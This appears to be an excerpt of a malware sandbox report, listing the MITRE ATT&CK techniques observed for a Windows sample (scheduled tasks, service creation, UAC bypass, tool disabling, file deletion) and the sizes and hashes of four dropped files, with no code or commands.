MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Scheduled Task/Job
1Windows Management Instrumentation
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD53ed8e52fe434b5f056aabc805d384013
SHA18f2c23dc76105af341cf883954aeb2be60e37cce
SHA256599cc4620b50d256167e3936c38f4a542e756edd5ec85f1cc9cddc1182c14b02
SHA5127a1fbd852c1442e2ca5d729bb7e3b9884e54cbd33916dbe86ac0426b44a1b491850a1a2557b1e72931f201347e1acb4a9a2c947630e683763d0deda9ac301e81
-
Filesize
1KB
MD56a1974f71093b501fd7f9e074b0474ec
SHA1ea480c2e6639b061fdf54d4214ecb432415e3369
SHA25663f686ea4f8a13a6f1b2242386c1c2ad943996697ed46d6f9237fdab17681c16
SHA512e09c316bf67f594413c6a9d70b9f6eff91ed5a24b377a5b7c82209cdf9e314bce10d338b098452071be822293b7b8287d655457f1db9a977f539cfdab849d081
-
Filesize
7KB
MD54149ced50d1167ca531bcd43484eed96
SHA1cfce8bad09e6947f9982549b07e44888ac8d9e08
SHA256277d2352139f0955a018dcf5252ec4ee726418f331eea260d83aa4c9dcc40a8e
SHA51252bbc9a60917ada5ab8909ab083bc13e01e2fb83cf8f748539c0db136a8c8199687d394a41e223d390ef3c94fdf511e1e55d250829cbef587135de1712f02bbf
-
Filesize
1KB
MD5d50d9d7af7389b37ddd2d4e9ee1c68c0
SHA16cb8d45479c45920cd46ccf9c65417f00955431b
SHA256ce9f27e0748409fba2fee29f39a8fb49eabefbff980358374d77a71c5a9944d8
SHA5126e5040e8146f63aaf184af16c42a9e668765d25114bee389499a00aafa744f92c50a06d95828699cacbc07ab26fd91f5cf87f4e17131572a01fe844bf432cabb